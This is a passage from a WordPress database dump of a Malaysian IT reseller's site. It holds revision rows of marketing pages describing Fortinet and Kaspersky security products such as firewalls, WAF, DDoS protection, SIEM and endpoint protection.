stacking across IDFs when managed, up to 300 switches based on FortiGate model.</li>\r\n</ul>\r\n4.Â <strong>Email Security</strong>\r\n\r\nEmail security remains a key productivity tool for today\'s organizations, as well as a successful attack vector for cyber criminals. FortiMail Email security utilizes the latest technologies and security services from FortiGuard Labs to deliver consistently top-rated protection from common and advanced threats while integrating robust data protection capabilities to avoid data loss.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Top-rated Antispam and Antiphishing</strong>\r\n\r\nMaintain productivity by shielding end users from unwanted spam and malicious phishing attacks.</li>\r\n 	<li><strong>Independently certified advanced threat defense</strong>\r\n\r\nThwart cyber criminals intent on stealing data, holding systems for ransomware, conducting fraud, and other malicious purposes.</li>\r\n 	<li><strong>Integrated data protection</strong>\r\n\r\nMaintain the privacy of personal information and confidentiality of sensitive data in compliance with regulatory and corporate guidelines.</li>\r\n 	<li><strong>High-performance mail handling</strong>\r\nSpeed the delivery of legitimate email at an affordable cost.</li>\r\n 	<li><strong>Enterprise-class management</strong>\r\nFree staff and end users to drive the business by reducing time spent on email administration.</li>\r\n</ul>\r\n<h3>APPLICATION SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Web Application Firewall (WAF)</strong></li>\r\n</ol>\r\nUnprotected web applications are the easiest point of entry for hackers and vulnerable to a number of attack types. FortiWebâ€™s AI-enhanced and multi-layered approach protects your web apps from the OWASP Top 10 and more. When combined with our Web Application Security Service from FortiGuard Labs youâ€™re protected from the latest application vulnerabilities, bots, and suspicious URLs, and with dual machine learning detection engines your applications are safe from sophisticated threats such as SQL injection, cross-site scripting, buffer overflows, cookie poisoning, malicious sources, and DoS attacks.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Proven Web Application Protection</strong>\r\n\r\nFortiWeb protects against all the OWASP Top-10 threats, DDoS attacks and many others to defend your mission critical web-based applications.</li>\r\n 	<li><strong>AI-based Threat Detection</strong>\r\nIn addition to regular signature updates and many other layers of defenses, FortiWebâ€™s AI-based, dual-layer machine learning engines protect against zero-day attacks.</li>\r\n 	<li><strong>Security Fabric Integration</strong>\r\n\r\nIntegration with FortiGate firewalls and FortiSandbox deliver protection from advanced persistent threats.</li>\r\n 	<li><strong>Hardware-based Acceleration</strong>\r\n\r\nFortiWeb delivers industry-leading protected WAF throughputs and blazing fast secure traffic encryption/decryption.</li>\r\n 	<li><strong>False Positive Mitigation Tools</strong>\r\n\r\nAdvanced tools that minimize the day-to-day management of policies and exception lists to ensure only unwanted traffic is blocked.</li>\r\n 	<li><strong>Advanced Visual Analytics</strong>\r\n\r\nFortiWebâ€™s visual reporting tools provide detailed analyses of attack sources, types and other elements that provide insights not available with other WAF solutions.</li>\r\n</ul>\r\n2.Â <strong>Application Delivery Controller</strong>\r\n\r\nWith bandwidth demand growing faster than budgets and cyber-attacks constantly on the rise, it can be challenging to securely and efficiently deliver applications at the speed your users expect. Fortinet Application Delivery Controller (ADC) appliances optimize the availability, user experience, and scalability of enterprise application delivery. They enable fast, secure, and intelligent acceleration and distribution of even the most demanding enterprise applications.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Secure Traffic Management</strong>\r\nSSL offloading, forward proxy and visibility increase responsiveness and assist in scanning for threats.</li>\r\n 	<li><strong>Application Optimization</strong>\r\nSpeed web application delivery with compression, caching, HTTP 2.0, and HTTP Page Speed-UP.</li>\r\n 	<li><strong>Security Fabric Integration</strong>\r\n\r\nAV and Sandbox integration scans attachments to protect from the latest threats.</li>\r\n 	<li><strong>Global Server Load Balancing</strong>\r\n\r\nDistributes traffic across multiple geographical locations for disaster recovery.</li>\r\n 	<li><strong>Security Features</strong>\r\n\r\nWeb Application Firewall, Web Filtering, and IP Reputation for enhanced security.</li>\r\n</ul>\r\n3.Â <strong>DDoS</strong>\r\n\r\nDistributed Denial of Service (DDoS) attacks are ever-evolving and use a variety of technologies. To successfully combat these attacks, you need a dynamic, multi-layered security solution. FortiDDoS protects from both known and zero day attacks with very low latency. Itâ€™s easy to deploy and manage, and includes comprehensive reporting and analysis tools.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>100% security processor (SPU)-based layer 3, 4, and 7 DDoS protection application-aware traffic management.</li>\r\n 	<li>Ability to monitor hundreds of thousands of parameters simultaneously.</li>\r\n 	<li>Behavior-based DDoS protection to eliminate need for signature files.</li>\r\n 	<li>Minimal false-positive detections through continuous threat evaluation.</li>\r\n 	<li>Attack protection for DNS services via specialized tools.</li>\r\n 	<li>Defense against every DDoS attack: bulk volumetric, layer 7 application, and SSL/HTTPS.</li>\r\n</ul>\r\n<h3>THREAT DETECTION &amp; PREVENTION</h3>\r\n<ol>\r\n 	<li><strong>Sandbox</strong></li>\r\n</ol>\r\nWith the increasing volume and sophistication of cyber-attacks, it takes only one threat to slip through security for a data breach to occur. CISOs have adopted sandboxing as an essential component of their security strategies to help combat previously unknown threats. While attack surfaces are becoming more dynamic due to the rise of IoT and cloud-based services, a continuing shortage of cyber security talent is driving organizations to integrate sandboxing with greater controls and a high degree of automation.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad integration</strong>\r\nExtends advanced threat protection to your next-generation firewall, web application firewall, secure email gateway, and endpoint protection platform.</li>\r\n 	<li><strong>Intelligent automation</strong>\r\nSpeeds mitigation by sharing real-time updates to disrupt threats at the origin and subsequent immunization across the entire organization and the global community.</li>\r\n 	<li><strong>All-in-one</strong>\r\n\r\nSimplifies deployment and reduces complexity by covering all protocols in a single common sandbox platform.</li>\r\n 	<li><strong>Flexible deployment</strong>\r\n\r\nAvailable as a physical or virtual appliance on premises, as well as a cloud-based or managed service.</li>\r\n 	<li><strong>Open extensibility</strong>\r\n\r\nFlexible APIs for easy third-party integration and available day-zero integration with Fabric-Ready partners.</li>\r\n</ul>\r\n2.Â <strong>FortiSIEM</strong>\r\n\r\nSecurity management only gets more complex. Endpoints, IoT, Infrastructure, Security Tools, Applications, VMâ€™s and Cloud â€“ the number of things you need to secure and monitor grows constantly. FortiSIEM â€“ Fortinetâ€™s Multivendor Security Incident and Events Management solution brings it all together. Visibility, Correlation, Automated Response and Remediation in a single, scalable solution. Using a Business Services view, the complexity of managing network and security operations is reduced, freeing resources, improving breach detection. Worldwide 80% of breaches go undetected because of skills shortage and event information â€˜noiseâ€™. FortiSIEM provides the cross correlation, applies machine learning and UEBA to improve response, to stop breaches before they occur.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Asset Self-Discovery</strong>\r\n\r\nVisibility needs to be both comprehensive and granular â€“ understanding a devices contextual capabilities and vulnerabilities reduces false positives.</li>\r\n 	<li><strong>Rapid Integrations and Scalability</strong>\r\n\r\nNetwork aware and security tool agnostic operations and management get a real-time business view of availability, utilization and security posture.</li>\r\n 	<li><strong>Automated Workflow</strong>\r\n\r\nA leading SOAR (Security Orchestration and Automated Response engine) the FortiSIEM Remediation Library responds to threats with the security tools you have today, and will grow with your enterprise.</li>\r\n 	<li><strong>Unified Platform</strong>\r\n\r\nMulti-tenancy for role-based access to a unified platform. Of benefit to MSPâ€™s and Enterprise customers alike â€“ deliver services and reports to a customer or a report. Share actionable intelligence and deliver value without compromise.</li>\r\n</ul>\r\n3.Â <strong>User and Entity Behavior Analytics (UEBA)</strong>\r\n\r\nFortinet User and Entity Behavior Analytics (UEBA) technology protects organizations from insider threats by continuously monitoring users and endpoints with automated detection and response capabilities. Leveraging machine learning and advanced analytics, Fortinet UEBA automatically identifies non-compliant, suspicious, or anomalous behavior and rapidly alerts any compromised user accounts. This proactive approach to threat detection delivers an additional layer of protection and visibility, whether users are on or off the corporate network.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Augmented Intelligence (AI)</strong>\r\n\r\nEnhanced data visibility with machine learning and UEBA to identify threats.</li>\r\n 	<li><strong>Rapid Threat Detection</strong>\r\n\r\nAI optimizes each stage of the threat investigation pipeline, shining a light on the unknown.</li>\r\n 	<li><strong>Regulatory Compliance Support</strong>\r\n\r\nSupport regulatory compliance with a dedicated reporting tool, to respond to and manage potential non-compliant activity.</li>\r\n 	<li><strong>Data Security</strong>\r\n\r\nMonitor data movement and endpoint activity 24/7 regardless of location or device, whether users are on or off your network.</li>\r\n 	<li><strong>Forensic-level Reporting</strong>\r\n\r\nCompile a full forensic history of user behavior, enabling thorough forensics investigation and detailed reporting.</li>\r\n 	<li><strong>Valuable Insights</strong>\r\n\r\nAnalyze data and deliver valuable insights, allowing your team to contain insider threats and respond in real time.</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]','Fortinet','','inherit','closed','closed','','1474-revision-v1','','','2018-12-17 12:22:15','2018-12-17 04:22:15','',1474,'https://bintara.com.my/blog/2018/12/17/1474-revision-v1/',0,'revision','',0),(2280,1,'2018-12-17 12:37:49','2018-12-17 04:37:49','<h3>Endpoint Security for Business</h3>\r\n<h3>SELECT</h3>\r\nWith more of your business operations going digital, you need to protect every server, laptop &amp; mobile device. In a single solution â€“ with one easy-to-use management console â€“ we deliver Next-Gen Security that helps you protect every endpoint your business runs.\r\n<ul>\r\n 	<li>Protects against the latest threats, including ransomware</li>\r\n 	<li>Hardens endpoints â€“ to reduce your exposure to cyberattacks</li>\r\n 	<li>Helps boost productivity â€“ via cloud-enabled usage controls</li>\r\n 	<li>Protects servers &amp; endpoints without damaging performance</li>\r\n 	<li>Secures diverse environments â€“ PC, Mac, Linux, iOS &amp; Android</li>\r\n 	<li>Simplifies security management â€“ with one unified console</li>\r\n</ul>\r\n<h4><img class=\"alignnone size-full wp-image-2281\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/KESB-Select.png\" alt=\"\" width=\"293\" height=\"220\" /></h4>\r\n<h4 class=\"section-title\">Performance &amp; multilayer protection</h4>\r\n<div>\r\n\r\nSecurity shouldnâ€™t slow you down. Thatâ€™s why our security has minimal impact on system performance â€“ and, if youâ€™re attacked, Automatic Rollback undoes most malicious actionsâ€¦ so users can keep on working.\r\n<h4><img class=\"alignnone size-full wp-image-2283\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/KESB-Select2.png\" alt=\"\" width=\"293\" height=\"220\" /></h4>\r\n<h4 class=\"section-title\">Next-Gen protection technologies</h4>\r\n<div>\r\n\r\nDelivers world-class security â€“ including static &amp; dynamic Machine Learning technologies â€“ to help reduce your businessâ€™s attack surface and keep all your endpoints safeâ€¦ while reducing the need to download frequent updates.\r\n\r\n</div>\r\n<h4><img class=\"alignnone size-full wp-image-2284\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/KESB-Select3.png\" alt=\"\" width=\"293\" height=\"220\" /></h4>\r\n<h4 class=\"section-title\">Simplifies security management tasks</h4>\r\n<div>\r\n\r\nHelps you deploy security rapidly and with the minimum of fuss â€“ using any of our wide range of preconfigured scenarios. A single unified management console makes it easy to apply your chosen security policies to every endpoint in your business.\r\n<h3></h3>\r\n<h3>The smart choice for security</h3>\r\n<h4>Future-proof your endpoint security</h4>\r\nWeâ€™ve identified more advanced threats than any other security vendor â€“ and weâ€™re recognized for innovation. So, you get security that adapts to protect you from new threatsâ€¦ whether your IT is on-site or outsourced.\r\n<h4>Keep tight control of your costs</h4>\r\nWith multiple security technologies â€“ including Next-Gen â€“ in a single product, there are no hidden costs. One product â€“ with one license â€“ is all you need to buy to protect your endpoints.\r\n<h4>Benefit from integration</h4>\r\nAll our core technologies are developed in-house â€“ and every function is within one agent â€“ so you benefit from efficient, integrated protection.\r\n<h4>Security that wins more awardsâ€¦ does more to protect</h4>\r\nDonâ€™t just take our word for it. In recent years, our products have participated in more independent tests &amp; reviews â€“ and have achieved more first places than any other vendor.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>','Kaspersky','','inherit','closed','closed','','1543-autosave-v1','','','2018-12-17 12:37:49','2018-12-17 04:37:49','',1543,'https://bintara.com.my/blog/2018/12/17/1543-autosave-v1/',0,'revision','',0),(2281,1,'2018-12-17 12:33:04','2018-12-17 04:33:04','','KESB-Select','','inherit','closed','closed','','kesb-select','','','2018-12-17 12:33:04','2018-12-17 04:33:04','',1543,'https://bintara.com.my/wp-content/uploads/2018/12/KESB-Select.png',0,'attachment','image/png',0),(2282,1,'2018-12-17 12:34:00','2018-12-17 04:34:00','Fortinet provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our uniqueÂ security fabricÂ combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration.\r\n\r\nFortiGate is available in a wide range of sizes and form factors to fit any environment and provides a broad array of next-generation security and networking functions. Complementary products can be deployed with a FortiGate to enable a simplified, end-to-end security infrastructure covering:\r\n<ul>\r\n 	<li>Network security</li>\r\n 	<li>Multi-Cloud security</li>\r\n 	<li>Web Application Security</li>\r\n 	<li>Email security</li>\r\n 	<li>Advanced Threat Protection</li>\r\n 	<li>Secure Unified Access</li>\r\n 	<li>Endpoint security</li>\r\n 	<li>Management and Analytics</li>\r\n</ul>\r\n<h3>NETWORK SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Next Generation Firewall (NGFW)</strong></li>\r\n</ol>\r\nFortiGate enterprise firewalls offer flexible deployments from the network edge to the core, data center, internal segment, and the Cloud. FortiGate enterprise firewalls leverages purpose-built security processors (SPUs) that delivers scalable performance of advanced security services like Threat Protection, SSL inspection, and ultra-low latency for protecting internal segments and mission critical environments.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>High-performance threat protection</strong></li>\r\n</ul>\r\nIndustry\'s highest threat protection and SSL inspection performance to protect from malware attacks hiding in encrypted traffic.\r\n<ul>\r\n 	<li><strong>Validated security effectiveness</strong></li>\r\n</ul>\r\nIndependently certified and continuous threat intelligence updates provide robust protection from known and unknown attacks.\r\n<ul>\r\n 	<li><strong>Protect mission critical applications</strong></li>\r\n</ul>\r\nHighly scalable segmentation and ultra-low latency to protect network segments.\r\n<ul>\r\n 	<li><strong>Continuous risk assessment via automation</strong></li>\r\n</ul>\r\nLeverage automated workflow and auditing features to deal with scarce security staff and continuously maintain compliance posture.\r\n<ul>\r\n 	<li><strong>Security Fabric integration</strong></li>\r\n</ul>\r\nIntelligently share threats across the entire digital attack surface to provide quick and automated protection.\r\n<ul>\r\n 	<li><strong>Enterprise class security management</strong></li>\r\n</ul>\r\nDeliver consistent security policy -- Single pane-of-glass to manage security assets irrespective of location and form factor.\r\n\r\n2.Â <strong>Secure SD-WAN</strong>\r\n\r\nFortinet is the only NGFW vendor to provide native SD-WAN along with integrated advanced threat protection. Fortinet, has received the â€œRecommendedâ€ rating for the first ever test conducted by NSS Labs for Software-Defined Wide Area Networking. Fortinet delivered excellent quality of experience for voice and video, high VPN throughput and best price/performance. FortiGate SD-WAN replaces separate WAN routers, WAN optimization, and security devices with a single solution that is application-aware, offers automatic WAN path control and multi-broadband support. It improves application performance, reduces WAN Operating expenses and minimizes management complexity.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>Application aware solution, support a broad range of 3000+ applications as well as granular visibility into sub-applications.</li>\r\n 	<li>Path awareness intelligence to monitor application-level transactions, and dynamically failover to the best available path.</li>\r\n 	<li>Single-pane-of-glass management simplifies deployment, management and monitoring of SD-WAN devices.</li>\r\n 	<li>Reduced complexity and high total cost of ownership by using best of breed SD-WAN and NGFW functionality on a single appliance.</li>\r\n 	<li>Improve cloud application performance by prioritizing business critical applications and enabling branches to directly communicate to the internet.</li>\r\n 	<li>Reduce operating expenses by migrating from MPLS and utilizing multi-broadband such as Ethernet, DSL, and LTE.</li>\r\n</ul>\r\n3.Â <strong>IPS</strong>\r\n\r\nWhether part of a firewall solution or a separate standalone appliance, Intrusion Prevention Systems (IPS) technology is becoming an increasingly ubiquitous part of network security defenses. Fortinet, well known for its next-generation firewall (NGFW) solution, has built IPS technology for more than ten years. Fortinet customers expect and depend on high performance from FortiGate firewalls and FortiGate IPS benefits from this legacy, delivering pound-for-pound, the best IPS performance available in the market today. FortiGate IPS, following a different evolution path than traditional IPS, innovates in ways that other standalone IPS products do not.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>World-class Protection</strong></li>\r\n</ul>\r\nDeep inspection for advanced threats, botnets, zero days and targeted attacks on the network.\r\n<ul>\r\n 	<li><strong>High performance</strong></li>\r\n</ul>\r\nInnovative security processor (SPU) technology for high-performance network throughput and deep security inspection.\r\n<ul>\r\n 	<li><strong>Advanced threat protection</strong></li>\r\n</ul>\r\nSeamless integration â€“ appliance or cloud service â€“ with world-class sandboxing for advanced threats.\r\n<ul>\r\n 	<li><strong>Security Fabric integration</strong></li>\r\n</ul>\r\nIntegration and automation with Fortinetâ€™s broad product portfolio and partner ecosystem.\r\n<ul>\r\n 	<li><strong>Data leak protection</strong></li>\r\n</ul>\r\nFile protection controls to prevent sensitive data exfiltration.\r\n\r\n4.Â <strong>Crypto VPNs</strong>\r\n\r\nMaintaining uniform security policy for all corporate users, applications, devices irrespective of their location and appropriate access control is essential to providing security in a multi-cloud environment. The data in motion must be protected using mutual authentication and confidentiality to protect sensitive corporate data over unprotected networks and provides a defensible proof of security.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Hardware assisted encryption</strong></li>\r\n</ul>\r\nPrevent breaches and secure data in transit at a very high speed.\r\n<ul>\r\n 	<li><strong>Scalable Security</strong></li>\r\n</ul>\r\nScalable security that is seamlessly integrated with routing.\r\n<ul>\r\n 	<li><strong>Comprehensive data communications security</strong></li>\r\n</ul>\r\nProtects Application to Application, User to Users, User to Machine, Machine to Machine communication.\r\n<ul>\r\n 	<li><strong>Diverse VPNs</strong></li>\r\n</ul>\r\nIPsec or SSL based diverse VPNs to offer flexible secure network choices.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nShare FortiTelemetry information across site-to-site tunnels with required confidentiality.\r\n<ul>\r\n 	<li><strong>Unified Management</strong></li>\r\n</ul>\r\nSimplified, easy-to-manage, single pane of glass to manage large scale crypto VPNs, Routing and NGFW.\r\n\r\n5.Â <strong>Secure Web Gateway (SWG)</strong>\r\n\r\nFortinet firewalls with Gateway Security protects enterprises against web attacks with URL filtering, visibility and control of encrypted web traffic via SSL inspection, and application of granular web application policies. Fortinet is the first and only gateway security vendor to earn Virus Bulletinâ€™s VBWeb certification for web filtering effectiveness.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>Feature-rich product that consolidates NGFW and SWG services.</li>\r\n 	<li>Powerful hardware that can perform SSL deep inspection.</li>\r\n 	<li>Anti-malware techniques updated with the latest threat intelligence.</li>\r\n 	<li>Reduce security teamâ€™s workload by providing a single pane of glass management for both NGFW and SWG.</li>\r\n 	<li>Effectively remove blind spots in encrypted traffic, without compromising on performance.</li>\r\n 	<li>Stay protected against the latest known and unknown internet-borne attacks.</li>\r\n</ul>\r\n6.Â <strong>Management &amp; Reporting</strong>\r\n\r\nSecurity teams globally are challenged by resource constraints, both in terms of the number of staff and raw security talent. Moreover, security teams are asked to do more, often in more complex networks and with growing numbers of alerts from multiple systems. Successful security teams allay these challenges by implementing three best practices. First, they simplify the way view management, combining operation NOC-style views with security-based SOC context. Second, they regularly measure and score their security effectiveness, enabling them anytime to answer how secure they are. Third, they demand deep integration so they can automate repetitive actions, especially across silos when possible.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Operationalized Visibility</strong></li>\r\n</ul>\r\nBig picture perspective allows you to see the forest through the tree.\r\n<ul>\r\n 	<li><strong>Cross Silo Automation</strong></li>\r\n</ul>\r\nDeeper than mere integration, orchestrate workflow responses to triggered security events.\r\n<ul>\r\n 	<li><strong>Simplified Management</strong></li>\r\n</ul>\r\nStreamline deployment and management, reducing task time and improving response time.\r\n<ul>\r\n 	<li><strong>Rapid Detection</strong></li>\r\n</ul>\r\nConsolidate telemetry and alerts to uncover patterns and discover security insights.\r\n<ul>\r\n 	<li><strong>Fortinet Fabric</strong></li>\r\n</ul>\r\nCentralized control over all of your Fortinet network assets.\r\n<h3>INFRASTRUCTURE PROTECTION</h3>\r\n<ol>\r\n 	<li><strong>Endpoint Protection</strong></li>\r\n</ol>\r\nEndpoints are frequently the target of initial compromise or attacks. FortiClient strengthens endpoint security through integrated visibility, control, and proactive defense. With the ability to discover, monitor, and assess endpoint risks, you can ensure endpoint compliance, mitigate risks, and reduce exposure. FortiClient proactively defends against advanced attacks. Its tight integration with the Security Fabric enables policy-based automation to contain threats and control outbreaks. FortiClient is compatible with Fabric-Ready partners to further strengthen enterprisesâ€™ security posture.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad endpoint visibility</strong></li>\r\n</ul>\r\nFortiClient Fabric Agent integrates endpoints into the Security Fabric and provides endpoint telemetry, including user identity, protection status, risk scores, unpatched vulnerabilities, security events, and more.\r\n<ul>\r\n 	<li><strong>Proactive endpoint defense</strong></li>\r\n</ul>\r\nAnti-exploit, sandbox integration, and behavior and pattern-based malware detection proactively detect and block malware, malicious scripts, document-based, and other advanced attacks.\r\n<ul>\r\n 	<li><strong>Automated threat containment</strong></li>\r\n</ul>\r\nIntegration with the Security Fabric enables automated response. Mitigate unpatched vulnerabilities, alert users, and quarantine risky or compromised endpoints to stem an outbreak.\r\n<ul>\r\n 	<li><strong>Secure remote access</strong></li>\r\n</ul>\r\nReliable, simple, and secure remote access with built-in, always-on VPN, with the added security of two-factor authentication, plus single-sign-on capabilities.\r\n<ul>\r\n 	<li><strong>Easy to deploy and manage</strong></li>\r\n</ul>\r\nEasy to deploy and manage Modular and light-weight endpoint agents are centrally managed with the Enterprise Manager Server (EMS). Fabric Agent is compatible with Fabric-Ready endpoint security solutions.\r\n\r\n2.Â <strong>Wireless</strong>\r\n\r\nFortinet provides a full suite of Wi-Fi Access Point and WLAN Controller products as part of our Secure Access solution designed to address the unique requirements of every organization. For assistance choosing an AP, our AP Product selector can be found here. Configuration and control of your wireless environment can be done directly with a FortiGate or via our dedicated Wireless LAN controllers. Fortinet also offers FortiManager and FortiCloud as management solutions for the entire Fortinet security fabric. All Fortinetâ€™s wireless solutions integrate with our location analytics platform: FortiPresence. This enables real-time locationing and device tracking.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nIntegration with FortiGate firewalls extends your security fabric out to the edge of the network.\r\n<ul>\r\n 	<li><strong>Superior density, scalability and mobilit</strong><strong>y</strong></li>\r\n</ul>\r\nHandle even the most complex RF environments.\r\n<ul>\r\n 	<li><strong>Zero-touch deployment</strong></li>\r\n</ul>\r\nFast and simple deployment with no requirements for onsite tech support.\r\n<ul>\r\n 	<li><strong>Simplified deployment and capacity expansion</strong></li>\r\n</ul>\r\nNo licenses to manage, just plug and go.\r\n<ul>\r\n 	<li><strong>Free location and analytics</strong></li>\r\n</ul>\r\nWireless device locationing tools included with no additional licenses required.\r\n<ul>\r\n 	<li><strong>Scalability from 1 to 10,000 APs</strong></li>\r\n</ul>\r\nA range of platforms for any sized deployment.\r\n\r\n3.Â <strong>Switching</strong>\r\n\r\nLegacy Ethernet LANs face many challenges including exponential growth in devices and applications, increased throughput demands from wireless LANs, and complex security implementations. Rather than asking how to secure traditional Ethernet LANs, Fortinet takes a security centric approach offering Ethernet as an extension of the security infrastructure through FortiSwitch and FortiLink. FortiSwitch offers a broad portfolio of secure, simple, and scalable Ethernet switches for applications that range from desktop to data center.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration with FortiLink</strong></li>\r\n</ul>\r\nFortiGate management of FortiSwitch extends Security Fabric features to the Ethernet access layer.\r\n<ul>\r\n 	<li><strong>No Touch Provisioning and Management with FortiLink</strong></li>\r\n</ul>\r\nAuto discovery, Global VLAN and Security Policies, Firewall interfaces and Ethernet ports equally secure.\r\n<ul>\r\n 	<li><strong>Highly Scalable</strong></li>\r\n</ul>\r\nBroad portfolio of stackable 1, 10, and 40 GE access ports with up to 100 GE uplinks to scale from desktop to datacenter.\r\n<ul>\r\n 	<li><strong>Unparalleled Visibility</strong></li>\r\n</ul>\r\nSingle pane of glass management of both Security and Network Access, Device detection and port visibility.\r\n<ul>\r\n 	<li><strong>Enable voice, data, and wireless traffic across a single network</strong></li>\r\n</ul>\r\nPower network and IoT devices with POE, Auto provision using LLDP-MED.\r\n<ul>\r\n 	<li><strong>Virtual Stacking</strong></li>\r\n</ul>\r\nFortiLink enables stacking across IDFs when managed, up to 300 switches based on FortiGate model.\r\n\r\n4.Â <strong>Email Security</strong>\r\n\r\nEmail security remains a key productivity tool for today\'s organizations, as well as a successful attack vector for cyber criminals. FortiMail Email security utilizes the latest technologies and security services from FortiGuard Labs to deliver consistently top-rated protection from common and advanced threats while integrating robust data protection capabilities to avoid data loss.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Top-rated Antispam and Antiphishing</strong></li>\r\n</ul>\r\nMaintain productivity by shielding end users from unwanted spam and malicious phishing attacks.\r\n<ul>\r\n 	<li><strong>Independently certified advanced threat defense</strong></li>\r\n</ul>\r\nThwart cyber criminals intent on stealing data, holding systems for ransomware, conducting fraud, and other malicious purposes.\r\n<ul>\r\n 	<li><strong>Integrated data protection</strong></li>\r\n</ul>\r\nMaintain the privacy of personal information and confidentiality of sensitive data in compliance with regulatory and corporate guidelines.\r\n<ul>\r\n 	<li><strong>High-performance mail handling</strong></li>\r\n</ul>\r\nSpeed the delivery of legitimate email at an affordable cost.\r\n<ul>\r\n 	<li><strong>Enterprise-class management</strong></li>\r\n</ul>\r\nFree staff and end users to drive the business by reducing time spent on email administration.\r\n<h3>APPLICATION SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Web Application Firewall (WAF)</strong></li>\r\n</ol>\r\nUnprotected web applications are the easiest point of entry for hackers and vulnerable to a number of attack types. FortiWebâ€™s AI-enhanced and multi-layered approach protects your web apps from the OWASP Top 10 and more. When combined with our Web Application Security Service from FortiGuard Labs youâ€™re protected from the latest application vulnerabilities, bots, and suspicious URLs, and with dual machine learning detection engines your applications are safe from sophisticated threats such as SQL injection, cross-site scripting, buffer overflows, cookie poisoning, malicious sources, and DoS attacks.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Proven Web Application Protection</strong></li>\r\n</ul>\r\nFortiWeb protects against all the OWASP Top-10 threats, DDoS attacks and many others to defend your mission critical web-based applications.\r\n<ul>\r\n 	<li><strong>AI-based Threat Detection</strong></li>\r\n</ul>\r\nIn addition to regular signature updates and many other layers of defenses, FortiWebâ€™s AI-based, dual-layer machine learning engines protect against zero-day attacks.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nIntegration with FortiGate firewalls and FortiSandbox deliver protection from advanced persistent threats.\r\n<ul>\r\n 	<li><strong>Hardware-based Acceleration</strong></li>\r\n</ul>\r\nFortiWeb delivers industry-leading protected WAF throughputs and blazing fast secure traffic encryption/decryption.\r\n<ul>\r\n 	<li><strong>False Positive Mitigation Tools</strong></li>\r\n</ul>\r\nAdvanced tools that minimize the day-to-day management of policies and exception lists to ensure only unwanted traffic is blocked.\r\n<ul>\r\n 	<li><strong>Advanced Visual Analytics</strong></li>\r\n</ul>\r\nFortiWebâ€™s visual reporting tools provide detailed analyses of attack sources, types and other elements that provide insights not available with other WAF solutions.\r\n\r\n2.Â <strong>Application Delivery Controller</strong>\r\n\r\nWith bandwidth demand growing faster than budgets and cyber-attacks constantly on the rise, it can be challenging to securely and efficiently deliver applications at the speed your users expect. Fortinet Application Delivery Controller (ADC) appliances optimize the availability, user experience, and scalability of enterprise application delivery. They enable fast, secure, and intelligent acceleration and distribution of even the most demanding enterprise applications.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Secure Traffic Management</strong></li>\r\n</ul>\r\nSSL offloading, forward proxy and visibility increase responsiveness and assist in scanning for threats.\r\n<ul>\r\n 	<li><strong>Application Optimization</strong></li>\r\n</ul>\r\nSpeed web application delivery with compression, caching, HTTP 2.0, and HTTP Page Speed-UP.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nAV and Sandbox integration scans attachments to protect from the latest threats.\r\n<ul>\r\n 	<li><strong>Global Server Load Balancing</strong></li>\r\n</ul>\r\nDistributes traffic across multiple geographical locations for disaster recovery.\r\n<ul>\r\n 	<li><strong>Security Features</strong></li>\r\n</ul>\r\nWeb Application Firewall, Web Filtering, and IP Reputation for enhanced security.\r\n\r\n3.Â <strong>DDoS</strong>\r\n\r\nDistributed Denial of Service (DDoS) attacks are ever-evolving and use a variety of technologies. To successfully combat these attacks, you need a dynamic, multi-layered security solution. FortiDDoS protects from both known and zero day attacks with very low latency. Itâ€™s easy to deploy and manage, and includes comprehensive reporting and analysis tools.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>100% security processor (SPU)-based layer 3, 4, and 7 DDoS protection application-aware traffic management.</li>\r\n 	<li>Ability to monitor hundreds of thousands of parameters simultaneously.</li>\r\n 	<li>Behavior-based DDoS protection to eliminate need for signature files.</li>\r\n 	<li>Minimal false-positive detections through continuous threat evaluation.</li>\r\n 	<li>Attack protection for DNS services via specialized tools.</li>\r\n 	<li>Defense against every DDoS attack: bulk volumetric, layer 7 application, and SSL/HTTPS.</li>\r\n</ul>\r\n<h3>THREAT DETECTION &amp; PREVENTION</h3>\r\n<ol>\r\n 	